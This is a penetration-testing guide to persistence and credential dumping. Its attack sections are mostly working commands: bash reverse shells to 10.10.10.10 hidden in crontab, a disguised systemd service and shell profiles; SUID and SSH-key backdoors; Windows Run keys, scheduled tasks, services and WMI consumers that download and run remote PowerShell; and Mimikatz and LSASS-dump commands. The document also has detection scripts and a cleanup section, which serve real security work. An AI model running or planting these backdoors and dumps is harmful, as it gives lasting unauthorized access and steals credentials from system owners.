Persistence Mechanisms: Backdoors, Scheduled Tasks, and LSASS Credential Dumping
Persistence is the phase where you ensure your access survives reboots, logoffs, and incident response activities. As a penetration tester, demonstrating persistence capability proves the risk of an attacker maintaining long-term access — a critical finding for any engagement report. This guide covers realistic persistence techniques and the credential dumping that often enables lateral movement.
Persistence Techniques Overview
| Technique | OS | Tool/Method | Detection Risk | MITRE ATT&CK |
|---|---|---|---|---|
| Cron job | Linux | crontab -e, /etc/cron.d/ | Medium | T1053.003 |
| Startup script | Linux | ~/.bashrc, /etc/profile.d/ | Low | T1546.004 |
| Systemd service | Linux | /etc/systemd/system/ | Medium | T1543.002 |
| Registry run key | Windows | HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Medium | T1547.001 |
| Scheduled task | Windows | schtasks /create | Medium | T1053.005 |
| WMI subscription | Windows | WMI event subscription | Low | T1546.003 |
| DLL hijacking | Windows | Replace DLL in app dir | Low | T1574.001 |
| SSH authorized_keys | Linux | ~/.ssh/authorized_keys | Low | T1098.004 |
| SUID backdoor | Linux | chmod +s /bin/bash | High | T1548.001 |
| Web shell | Both | PHP/ASPX/JSP in web root | High | T1505.003 |

Linux Persistence Techniques
Crontab Backdoor
```bash
# Add a cron job for the current user (survives as long as user exists)
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'") | crontab -
# System-wide cron (requires root)
echo '* * * * * root bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"' >> /etc/crontab
# More stealthy — use a script file so crontab entry looks legitimate
echo '#!/bin/bash' > /tmp/.sysupdate
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' >> /tmp/.sysupdate
chmod +x /tmp/.sysupdate
(crontab -l 2>/dev/null; echo "@reboot /tmp/.sysupdate") | crontab -
```
Systemd Service
```bash
# Create a persistent backdoor service (requires root)
cat > /etc/systemd/system/sysmon.service << 'EOF'
[Unit]
Description=System Monitor Service
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable sysmon
systemctl start sysmon
```
Shell Profile Backdoor
```bash
# Execute on every bash login (noisy but simple)
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &' >> ~/.bashrc
# More stealthy — only trigger if specific condition is met
echo 'if [ $(id -u) -eq 0 ]; then nohup bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" &>/dev/null & fi' >> /etc/profile
```
SSH Authorized Keys
```bash
# Best persistence on Linux — stable, interactive, no callbacks
mkdir -p /root/.ssh
echo "ssh-ed25519 AAAA...attacker_pubkey..." >> /root/.ssh/authorized_keys
chmod 700 /root/.ssh && chmod 600 /root/.ssh/authorized_keys
```
SUID Backdoor
```bash
# Create a copy of bash with SUID bit set
cp /bin/bash /tmp/.hidden_bash
chmod +s /tmp/.hidden_bash
# Later, escalate from any user:
/tmp/.hidden_bash -p   # -p preserves EUID (root)
```
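Every Linux technique above leaves a file-system artifact, which is what a host audit or the post-engagement cleanup check should look for. The script below is an added example (not part of the original cheat sheet) that audits text pulled from those locations: crontab output, a systemd unit, a shell profile, an authorized_keys file and a SUID file listing. The indicator patterns, the approved-key inventory and the "system binary directory" list are assumptions for the example, and all sample inputs are constructed from the commands shown above.

```python
"""Audit text collected from the Linux persistence locations listed above for
the artifacts those techniques leave behind. Sample inputs are constructed."""
import re

# Indicator patterns; assumptions for this example, not an exhaustive signature set.
REVERSE_SHELL = re.compile(r"/dev/(tcp|udp)/\S+")                # bash /dev/tcp callback
HIDDEN_TEMP = re.compile(r"/(tmp|var/tmp|dev/shm)/\.[\w.-]+")    # dot-file in a temp dir
SYSTEM_BIN_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")
SHELL_NAMES = ("bash", "sh", "dash", "zsh", "ksh")


def audit_cron(text, source):
    """Flag cron lines with a network callback, a hidden temp-dir target, or @reboot."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if REVERSE_SHELL.search(entry):
            findings.append((source, n, "cron entry opens a reverse shell"))
        elif HIDDEN_TEMP.search(entry):
            findings.append((source, n, "cron entry runs a hidden file from a temp dir"))
        elif entry.startswith("@reboot"):
            findings.append((source, n, "@reboot entry, review its target"))
    return findings


def audit_systemd_unit(text, source):
    """Flag units whose ExecStart wraps a shell callback and auto-restarts."""
    findings = []
    exec_line = next((l for l in text.splitlines() if l.startswith("ExecStart=")), "")
    if REVERSE_SHELL.search(exec_line):
        findings.append((source, 0, "ExecStart opens a reverse shell"))
    if "bash -c" in exec_line and "Restart=always" in text:
        findings.append((source, 0, "shell wrapper in ExecStart with Restart=always"))
    return findings


def audit_profile(text, source):
    """Flag login-triggered callbacks in ~/.bashrc or /etc/profile style files."""
    return [(source, n, "login-triggered callback in shell profile")
            for n, line in enumerate(text.splitlines(), 1)
            if REVERSE_SHELL.search(line) or ("nohup" in line and "id -u" in line)]


def audit_authorized_keys(text, source, approved_keys):
    """Report keys whose key material is not in the approved inventory (assumes no option prefix)."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 2 or line.lstrip().startswith("#"):
            continue
        if fields[1] not in approved_keys:      # fields[1] is the base64 key blob
            findings.append((source, n, "unapproved public key"))
    return findings


def audit_suid(paths, source="find / -perm -4000"):
    """Flag SUID files that are shell copies or live outside system binary dirs."""
    findings = []
    for path in paths:
        name = path.rsplit("/", 1)[-1].lstrip(".")
        outside = not path.startswith(SYSTEM_BIN_DIRS)
        shell_copy = any(name == s or name.endswith("_" + s) for s in SHELL_NAMES)
        if outside or shell_copy:
            findings.append((source, 0, f"suspicious SUID binary {path}"))
    return findings


# Constructed sample inputs mirroring the commands in this section.
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
@reboot /tmp/.sysupdate
"""
SAMPLE_UNIT = """[Unit]
Description=System Monitor Service
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
Restart=always
"""
SAMPLE_PROFILE = """export PATH=$PATH:/usr/local/bin
if [ $(id -u) -eq 0 ]; then nohup bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" &>/dev/null & fi
"""
SAMPLE_KEYS = """ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownAdminKeyExample admin@bastion
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIUnknownKeyExample
"""
APPROVED_KEYS = {"AAAAC3NzaC1lZDI1NTE5AAAAIKnownAdminKeyExample"}   # constructed inventory
SAMPLE_SUID = ["/usr/bin/sudo", "/usr/bin/passwd", "/tmp/.hidden_bash", "/bin/bash"]


def audit_all():
    """Run every check over the constructed samples; returns (source, line, reason) tuples."""
    return (audit_cron(SAMPLE_CRONTAB, "crontab -l")
            + audit_systemd_unit(SAMPLE_UNIT, "sysmon.service")
            + audit_profile(SAMPLE_PROFILE, "/etc/profile")
            + audit_authorized_keys(SAMPLE_KEYS, "/root/.ssh/authorized_keys", APPROVED_KEYS)
            + audit_suid(SAMPLE_SUID))


if __name__ == "__main__":
    for source, line, reason in audit_all():
        print(f"{source}:{line}: {reason}")
```

On a real host the same functions would be fed the output of `crontab -l`, the contents of `/etc/crontab` and `/etc/cron.d/*`, each unit under `/etc/systemd/system/`, the shell profiles, every `authorized_keys` file and `find / -perm -4000`; the approved-key set is the part that has to come from your own inventory.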
Windows Persistence Techniques
Registry Run Keys
```batch
:: Per-user persistence (runs on login for current user)
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /t REG_SZ /d "C:\Users\victim\AppData\Roaming\update.exe" /f
:: System-wide (requires admin, runs for all users)
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "SecurityService" /t REG_SZ /d "C:\Windows\System32\svchost_backdoor.exe" /f
:: RunOnce (one-time execution, then deleted)
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v "Setup" /t REG_SZ /d "C:\evil\setup.exe" /f
```
Scheduled Task
```batch
:: Create a scheduled task running as SYSTEM
schtasks /create /tn "WindowsDefenderUpdate" /tr "C:\evil\backdoor.exe" /sc ONLOGON /ru SYSTEM /f
:: Repeating task every 5 minutes
schtasks /create /tn "HealthCheck" /tr "powershell -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/ps.ps1')" /sc MINUTE /mo 5 /ru SYSTEM /f
```
Malicious Service
```batch
:: Create a new service pointing to your backdoor
sc create "WinDefSvc" binpath= "C:\evil\backdoor.exe" start= auto displayname= "Windows Defender Service"
sc start WinDefSvc
```
WMI Subscriptions (Fileless)
```powershell
# WMI event subscriptions survive reboots and leave minimal traces
# Run this PowerShell as admin:
$EventFilter = ([wmiclass]"\root\subscription:__EventFilter").CreateInstance()
$EventFilter.QueryLanguage = "WQL"
$EventFilter.Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfRawData_PerfOS_System'"
$EventFilter.Name = "SystemFilter"
$EventFilter.Put()
$Consumer = ([wmiclass]"\root\subscription:CommandLineEventConsumer").CreateInstance()
$Consumer.Name = "SystemConsumer"
$Consumer.CommandLineTemplate = "powershell.exe -ep bypass -c `"IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/ps.ps1')`""
$Consumer.Put()
$Binding = ([wmiclass]"\root\subscription:__FilterToConsumerBinding").CreateInstance()
$Binding.Filter = $EventFilter.__Path
$Binding.Consumer = $Consumer.__Path
$Binding.Put()
```
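Each of the four Windows techniques above (Run keys, scheduled tasks, services, WMI subscriptions) produces a distinct log event that a detection pipeline can key on: Sysmon Event 13 for the registry value write, Security Event 4698 for task creation, System Event 7045 for the service install, and Sysmon Event 20 for the WMI consumer. The triage script below is an added example (not from the original cheat sheet) that screens such records for the patterns the commands above would leave. The event field names follow the Sysmon and Windows event schemas; the records, the "system directory" allowlist and the download-cradle pattern are constructed assumptions for the example.

```python
"""Screen Windows event records for Run-key, scheduled-task, service and WMI
persistence. Records are constructed dicts mirroring the real event fields."""
import re

# Anything a persistence entry launches from outside these roots is worth a look (assumption).
SYSTEM_DIRS = re.compile(r"^c:\\(windows|program files)", re.I)
# PowerShell download-cradle fragments used by the task and WMI examples above.
DOWNLOAD_CRADLE = re.compile(r"(-ep\s+bypass|-ExecutionPolicy\s+bypass|\bIEX\b|DownloadString|Invoke-Expression)", re.I)


def check_run_key(ev):
    """Sysmon EventID 13: registry value set under a Run/RunOnce key."""
    target = ev.get("TargetObject", "")
    if not re.search(r"\\CurrentVersion\\Run(Once)?\\", target, re.I):
        return None
    details = ev.get("Details", "").strip('"')
    if not SYSTEM_DIRS.search(details):
        return f"Run key {target} points at a non-system path: {details}"
    return None


def check_scheduled_task(ev):
    """Security EventID 4698: task created; TaskContent carries the task XML."""
    xml = ev.get("TaskContent", "")
    cmd = re.search(r"<Command>(.*?)</Command>", xml, re.S)
    args = re.search(r"<Arguments>(.*?)</Arguments>", xml, re.S)
    full = ((cmd.group(1) if cmd else "") + " " + (args.group(1) if args else "")).strip()
    runs_as_system = "<UserId>S-1-5-18</UserId>" in xml
    if DOWNLOAD_CRADLE.search(full):
        return f"task {ev.get('TaskName')} runs a PowerShell download cradle"
    if runs_as_system and not SYSTEM_DIRS.search(full):
        return f"SYSTEM task {ev.get('TaskName')} executes a non-system binary: {full}"
    return None


def check_service(ev):
    """System EventID 7045: new service installed."""
    path = ev.get("ImagePath", "").strip('"')
    if not SYSTEM_DIRS.search(path):
        return f"service {ev.get('ServiceName')} installed from a non-system path: {path}"
    return None


def check_wmi(ev):
    """Sysmon EventID 20: WmiEventConsumer created."""
    if ev.get("Type") == "Command Line" and DOWNLOAD_CRADLE.search(ev.get("Destination", "")):
        return f"WMI CommandLineEventConsumer {ev.get('Name')} launches a download cradle"
    if ev.get("Type") in ("Command Line", "Active Script"):
        return f"WMI consumer {ev.get('Name')} of type {ev['Type']} (review)"
    return None


CHECKS = {
    ("Microsoft-Windows-Sysmon", 13): check_run_key,
    ("Microsoft-Windows-Security-Auditing", 4698): check_scheduled_task,
    ("Service Control Manager", 7045): check_service,
    ("Microsoft-Windows-Sysmon", 20): check_wmi,
}


def triage(events):
    """Return (EventID, message) for every record a check flags."""
    alerts = []
    for ev in events:
        check = CHECKS.get((ev.get("Provider"), ev.get("EventID")))
        message = check(ev) if check else None
        if message:
            alerts.append((ev["EventID"], message))
    return alerts


# Constructed records: the four techniques above plus two benign entries.
SAMPLE_EVENTS = [
    {"Provider": "Microsoft-Windows-Sysmon", "EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate",
     "Details": r"C:\Users\victim\AppData\Roaming\update.exe"},
    {"Provider": "Microsoft-Windows-Sysmon", "EventID": 13,
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},
    {"Provider": "Microsoft-Windows-Security-Auditing", "EventID": 4698, "TaskName": r"\HealthCheck",
     "TaskContent": "<Task><Principals><Principal><UserId>S-1-5-18</UserId></Principal></Principals>"
                    "<Actions><Exec><Command>powershell</Command><Arguments>-ep bypass -c IEX "
                    "(New-Object Net.WebClient).DownloadString('http://10.10.10.10/ps.ps1')</Arguments>"
                    "</Exec></Actions></Task>"},
    {"Provider": "Microsoft-Windows-Security-Auditing", "EventID": 4698, "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": "<Task><Principals><Principal><UserId>S-1-5-18</UserId></Principal></Principals>"
                    "<Actions><Exec><Command>C:\\Windows\\System32\\defrag.exe</Command><Arguments>-c -h</Arguments>"
                    "</Exec></Actions></Task>"},
    {"Provider": "Service Control Manager", "EventID": 7045, "ServiceName": "WinDefSvc",
     "ImagePath": r"C:\evil\backdoor.exe"},
    {"Provider": "Microsoft-Windows-Sysmon", "EventID": 20, "Name": "SystemConsumer", "Type": "Command Line",
     "Destination": "powershell.exe -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/ps.ps1')\""},
]

if __name__ == "__main__":
    for event_id, message in triage(SAMPLE_EVENTS):
        print(f"[{event_id}] {message}")
```

The "system directory" test is deliberately crude: the `HKLM` example above drops its binary into `C:\Windows\System32`, which this check would not flag, so in practice pair path checks with signature verification and a baseline of known Run values, tasks and services per host image.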
Credential Dumping with Mimikatz
Mimikatz remains the gold standard for Windows credential extraction. It requires admin/SYSTEM privileges:
```batch
:: Dump credentials from LSASS memory (cleartext passwords if WDigest enabled)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
:: Dump NTLM hashes from SAM (local accounts)
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
:: DCSync attack — dump all domain hashes without touching LSASS
:: Requires Domain Replication privileges (DA or equivalent)
mimikatz.exe "lsadump::dcsync /domain:corp.local /all /csv" "exit"
:: Golden Ticket creation
mimikatz.exe "kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:aad3b435... /id:500" "exit"
:: Pass-the-Hash (lateral movement)
mimikatz.exe "sekurlsa::pth /user:admin /domain:corp.local /ntlm:aad3b435... /run:cmd.exe"
```
LSASS Dump Without Mimikatz
Dropping mimikatz.exe on disk triggers AV. Instead, dump LSASS memory and process it offline:
```batch
:: Method 1: procdump (Microsoft-signed, often AV-whitelisted)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
:: Method 2: comsvcs.dll (built-in Windows DLL, very stealthy)
:: Get LSASS PID first
tasklist | findstr lsass
:: Then dump (run as SYSTEM or admin); 820 is the PID from tasklist, replace it with yours
rundll32.exe C:\windows\System32\comsvcs.dll MiniDump 820 C:\lsass.dmp full
:: Method 3: Task Manager (GUI) — right-click lsass.exe > Create dump file
:: Saves to C:\Users\[user]\AppData\Local\Temp\lsass.DMP
:: Process the dump offline with mimikatz (on attacker machine):
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
```
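Whichever of the tools above opens LSASS, the common denominator is a process handle to lsass.exe with memory-read rights, which Sysmon records as Event 10 (ProcessAccess) alongside the Event 1 command line of the tool itself. The script below is an added example (not from the original cheat sheet) that triages such records: it flags handles to lsass.exe carrying PROCESS_VM_READ from anything outside a small allowlist, and command lines matching the procdump, comsvcs.dll and mimikatz invocations shown in the two sections above. The allowlist and the sample records are constructed assumptions; the access-mask constants are the documented Windows values.

```python
"""Triage Sysmon ProcessAccess (10) and ProcessCreate (1) records for LSASS
dumping. Records below are constructed to mirror the real event fields."""
import re

# Process access-right bits (documented Windows values).
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF

# Processes that routinely open lsass.exe on a typical host; assumption, tune per fleet.
EXPECTED_ACCESSORS = {
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\svchost.exe",
}

# Command-line patterns for the dump methods described above.
DUMP_CMDLINES = [
    (re.compile(r"procdump(64)?\.exe.*-ma\s+lsass", re.I), "procdump full dump of lsass"),
    (re.compile(r"rundll32.*comsvcs\.dll", re.I), "comsvcs.dll MiniDump via rundll32"),
    (re.compile(r"sekurlsa::|lsadump::", re.I), "mimikatz module on the command line"),
]


def lsass_access_alert(ev):
    """Sysmon EventID 10: reason string if the handle looks like a memory-read of lsass."""
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    access = int(ev.get("GrantedAccess", "0x0"), 16)
    source = ev.get("SourceImage", "").lower()
    reads_memory = bool(access & PROCESS_VM_READ) or access == PROCESS_ALL_ACCESS
    if reads_memory and source not in EXPECTED_ACCESSORS:
        return f"{source} opened lsass.exe with GrantedAccess 0x{access:x} (includes VM_READ)"
    return None


def process_create_alert(ev):
    """Sysmon EventID 1: match the command line against known dump tooling."""
    cmd = ev.get("CommandLine", "")
    for pattern, reason in DUMP_CMDLINES:
        if pattern.search(cmd):
            return f"{reason}: {cmd}"
    return None


def triage(events):
    """Return (EventID, message) for each record that trips a check."""
    alerts = []
    for ev in events:
        message = None
        if ev.get("EventID") == 10:
            message = lsass_access_alert(ev)
        elif ev.get("EventID") == 1:
            message = process_create_alert(ev)
        if message:
            alerts.append((ev["EventID"], message))
    return alerts


# Constructed records: one benign query, two dump-style handles, the three
# command lines from this section, and one unrelated process.
LSASS = r"C:\Windows\System32\lsass.exe"
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1000"},                         # QUERY_LIMITED_INFORMATION only
    {"EventID": 10, "SourceImage": r"C:\Tools\procdump.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1FFFFF"},                       # PROCESS_ALL_ACCESS
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1410"},                         # VM_READ | QUERY_INFORMATION | QUERY_LIMITED
    {"EventID": 1, "Image": r"C:\Tools\procdump.exe",
     "CommandLine": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\windows\System32\comsvcs.dll MiniDump 820 C:\lsass.dmp full"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\notes.txt"},
]

if __name__ == "__main__":
    for event_id, message in triage(SAMPLE_EVENTS):
        print(f"[{event_id}] {message}")
```

The Task Manager method leaves no tool on disk and no distinctive command line, which is why the handle-based check (Event 10 with VM_READ from taskmgr.exe) matters more than the command-line signatures. On the prevention side, running LSASS as a protected process (LSA Protection, RunAsPPL) or enabling Credential Guard removes the memory-read path these methods depend on.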
The Active Directory Generator produces DCSync, Golden Ticket, and Kerberoasting commands tailored to your domain. After dumping hashes, use the Hash Cracking Tool to identify and crack NTLM hashes.
Cleaning Up Artifacts
A professional pentest includes verifying that your test artifacts are removed:
```bash
# Linux cleanup
crontab -r                       # Removes every entry for this user; if a crontab existed before the test, delete only your test lines instead
systemctl disable --now sysmon   # Stop and disable the service (disable alone leaves it running)
rm /etc/systemd/system/sysmon.service
sed -i '/10.10.10.10/d' ~/.bashrc   # Remove profile backdoor (apply the same to /etc/profile if the root-only trigger was used)
rm /tmp/.hidden_bash /tmp/.sysupdate
```
```batch
:: Windows cleanup
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /f
schtasks /delete /tn "WindowsDefenderUpdate" /f
sc stop WinDefSvc && sc delete WinDefSvc
```